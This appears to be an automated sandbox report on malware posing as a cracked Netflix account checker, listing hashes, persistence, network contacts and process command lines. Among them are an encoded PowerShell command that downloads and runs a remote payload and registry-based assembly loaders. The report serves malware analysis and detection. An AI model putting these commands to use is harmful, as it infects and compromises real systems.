| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/3688-269-0x0000000006570000-0x00000000065A2000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/3304-282-0x0000000000410000-0x0000000000422000-memory.dmp
memory/3688-281-0x00000000064E0000-0x00000000064FE000-memory.dmp
memory/3688-270-0x000000006FA80000-0x000000006FACC000-memory.dmp
memory/3688-285-0x00000000078D0000-0x0000000007F4A000-memory.dmp
memory/3688-286-0x0000000007290000-0x00000000072AA000-memory.dmp
memory/3776-288-0x0000000002A60000-0x0000000002A70000-memory.dmp
memory/3688-287-0x000000007F1D0000-0x000000007F1E0000-memory.dmp
memory/3304-289-0x0000000004DA0000-0x0000000004DB0000-memory.dmp
memory/3688-290-0x0000000007300000-0x000000000730A000-memory.dmp
memory/3688-291-0x0000000007510000-0x00000000075A6000-memory.dmp
memory/2748-292-0x00000000060C0000-0x0000000006104000-memory.dmp
memory/3688-293-0x00000000074C0000-0x00000000074CE000-memory.dmp
memory/3688-294-0x00000000075D0000-0x00000000075EA000-memory.dmp
memory/2748-295-0x0000000006E50000-0x0000000006E72000-memory.dmp
memory/3688-296-0x00000000075B0000-0x00000000075B8000-memory.dmp
memory/2748-297-0x0000000002520000-0x0000000002530000-memory.dmp
memory/3172-298-0x0000000004CC0000-0x0000000004CD0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 6195a91754effb4df74dbc72cdf4f7a6 |
| SHA1 | aba262f5726c6d77659fe0d3195e36a85046b427 |
| SHA256 | 3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5 |
| SHA512 | ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 436e0125cec6495a2eeb8bcee6b5bcb2 |
| SHA1 | 1b81cb527835eaaede3a21a08e5637dcc7611989 |
| SHA256 | 4b195c6ce2764de220cb0fc34119c05f54de57597c88e6c9c41c19d396196d4a |
| SHA512 | c646553ee11bf6da3db44e49d39209cf28db9599f3a09126f1a660aba4a848bef574611497790ddf59fd2e58bef7d01eb5ad6b898b04ff18740ae451e5ac2707 |
memory/2232-304-0x0000000005750000-0x0000000005760000-memory.dmp
memory/2232-305-0x0000000005750000-0x0000000005760000-memory.dmp
memory/2992-306-0x0000000005760000-0x0000000005770000-memory.dmp
memory/2748-307-0x0000000002520000-0x0000000002530000-memory.dmp
memory/2748-308-0x0000000002520000-0x0000000002530000-memory.dmp
memory/3172-309-0x0000000004CC0000-0x0000000004CD0000-memory.dmp
memory/3304-310-0x0000000004DA0000-0x0000000004DB0000-memory.dmp
memory/2748-311-0x0000000002520000-0x0000000002530000-memory.dmp
memory/3172-312-0x0000000004CC0000-0x0000000004CD0000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
28s
Max time network
33s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoYUIXZO.lnk | C:\Windows\SysWOW64\WScript.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KBnSgEeuZWeY.lnk | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Checker Netflix.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe"
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
"C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\l1l1l.vbs"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\powershell.js"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\r1r1.vbs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ANgAuAHQAbwBwADQAdABvAHAALgBuAGUAdAAvAHAAXwAxADMANQAyADkAdAA2AHIANwAxAC4AagBwAGcAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\tsQKDrCBEkat).evTHJP).'EntryPoint'.'Invoke'($Null,$Null)
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\vLEwUGUT).gukeLLVoun).'EntryPoint'.'Invoke'($Null,$Null)
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.125.24.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | papa.hopto.org | udp |
| US | 8.8.8.8:53 | 6.top4top.net | udp |
| FR | 195.154.118.206:443 | 6.top4top.net | tcp |
| US | 8.8.8.8:53 | 6.top4top.io | udp |
| FR | 195.154.118.206:443 | 6.top4top.io | tcp |
| US | 8.8.8.8:53 | 206.118.154.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.133.241.8.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
| MD5 | 068068c3cefb4c8d997271897c3173bb |
| SHA1 | d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e |
| SHA256 | 23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5 |
| SHA512 | 0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a |
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
| MD5 | 068068c3cefb4c8d997271897c3173bb |
| SHA1 | d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e |
| SHA256 | 23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5 |
| SHA512 | 0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a |
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
| MD5 | 068068c3cefb4c8d997271897c3173bb |
| SHA1 | d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e |
| SHA256 | 23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5 |
| SHA512 | 0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a |
C:\Users\Admin\AppData\Roaming\l1l1l.vbs
| MD5 | c78f607c916f060d6ee3bf391e303acc |
| SHA1 | 1575998cda060d4a570ba258abc12044601da283 |
| SHA256 | f1e57d1714f74c6939ee24bb348fa12e925ec7eb380d5a7d0f1d230effb742f4 |
| SHA512 | cf26b8b381402622df420fa3881630661d08d76660d01be2d695af8ade568a6f5e3b365e4b17bffee5589d936eeaad3f7ebf413f4a2d810d976b66511548875b |
memory/1836-151-0x0000000000280000-0x0000000000400000-memory.dmp
C:\Users\Admin\AppData\Roaming\r1r1.vbs
| MD5 | 0494f414da149631c3d59861865dad37 |
| SHA1 | c9fd335759efb52e58acb974af27cdecb35d0f10 |
| SHA256 | a2effa9551b467c88ccea70024bd13650267752d1d6bcd91a5bd6915d9c47a56 |
| SHA512 | a86f2532f2ba996dc8421146d918250b1925daf803a470e3bce312f29a4d0b25af51d4abc005ab390650cb0cf6b4024df3c411e6ae4ed03cd51906b54683f333 |
C:\Users\Admin\AppData\Roaming\powershell.js
| MD5 | 40b65baa1541784dd92f5aa8ae11b0ef |
| SHA1 | 0772c95f56a025704c01389f2d1108a17fb987cf |
| SHA256 | 9609d3a8ee7d439c54aca9c5aeced07caa4199f116367ecb88b63e9e2e29a699 |
| SHA512 | fc784babe03c75559314dc15a04386d528e71b003b40349df2a4845576bbc9d2f0898d27fc5b1be8cda9fbf16715822bf0616fa7835e1abefe7ccacc8da3b3d2 |
memory/1836-157-0x0000000004D90000-0x0000000004DA0000-memory.dmp
memory/1836-158-0x00000000074E0000-0x000000000757C000-memory.dmp
memory/1836-159-0x0000000007B30000-0x00000000080D4000-memory.dmp
memory/1836-160-0x0000000007580000-0x0000000007612000-memory.dmp
memory/4692-163-0x0000000003160000-0x0000000003196000-memory.dmp
memory/4692-164-0x0000000005D80000-0x00000000063A8000-memory.dmp
memory/1836-165-0x00000000074D0000-0x00000000074DA000-memory.dmp
memory/1836-166-0x00000000080E0000-0x0000000008136000-memory.dmp
memory/4692-168-0x0000000005740000-0x0000000005750000-memory.dmp
memory/4692-172-0x0000000005B40000-0x0000000005B62000-memory.dmp
memory/4692-184-0x0000000006520000-0x0000000006586000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wa1vl5qb.isl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4692-173-0x0000000005C60000-0x0000000005CC6000-memory.dmp
memory/4692-171-0x0000000005740000-0x0000000005750000-memory.dmp
memory/4692-185-0x0000000006990000-0x00000000069AE000-memory.dmp
memory/4524-205-0x0000000002490000-0x00000000024A0000-memory.dmp
memory/3748-206-0x0000000002B00000-0x0000000002B10000-memory.dmp
memory/4524-203-0x0000000002490000-0x00000000024A0000-memory.dmp
memory/3748-207-0x0000000002B00000-0x0000000002B10000-memory.dmp
memory/1836-208-0x0000000004D90000-0x0000000004DA0000-memory.dmp
memory/4692-209-0x0000000005740000-0x0000000005750000-memory.dmp
memory/3748-210-0x0000000006940000-0x0000000006984000-memory.dmp
memory/4692-211-0x00000000081B0000-0x000000000882A000-memory.dmp
memory/4692-212-0x0000000006E00000-0x0000000006E1A000-memory.dmp
memory/3748-213-0x0000000007780000-0x0000000007816000-memory.dmp
memory/3748-215-0x0000000002B00000-0x0000000002B10000-memory.dmp
memory/4524-214-0x0000000006CE0000-0x0000000006D02000-memory.dmp
memory/4524-216-0x0000000002490000-0x00000000024A0000-memory.dmp
memory/4524-217-0x0000000007160000-0x00000000071D6000-memory.dmp
memory/1836-220-0x0000000004D90000-0x0000000004DA0000-memory.dmp
memory/4524-221-0x0000000002490000-0x00000000024A0000-memory.dmp
memory/4524-222-0x0000000002490000-0x00000000024A0000-memory.dmp
memory/3748-223-0x0000000002B00000-0x0000000002B10000-memory.dmp
memory/1836-224-0x0000000004D90000-0x0000000004DA0000-memory.dmp
memory/3748-225-0x0000000002B00000-0x0000000002B10000-memory.dmp
memory/4524-226-0x0000000002490000-0x00000000024A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | eec69f1a7eff9b5f29366da620e7de88 |
| SHA1 | be3b8ae89646aa781dfeb338ecf1b10a8c0c6060 |
| SHA256 | ffc642634c4337f759852084b94b5bbbb247285d16408d4bec65f240004af5c2 |
| SHA512 | 70d7184fdd97388eb5eeeab2fb716e96a1a4d3a4339e83e98a9b2ca3621c19d379936a108b49d11da971cc428683835f44fc21c59ffb014e3fb5f19c07aa5061 |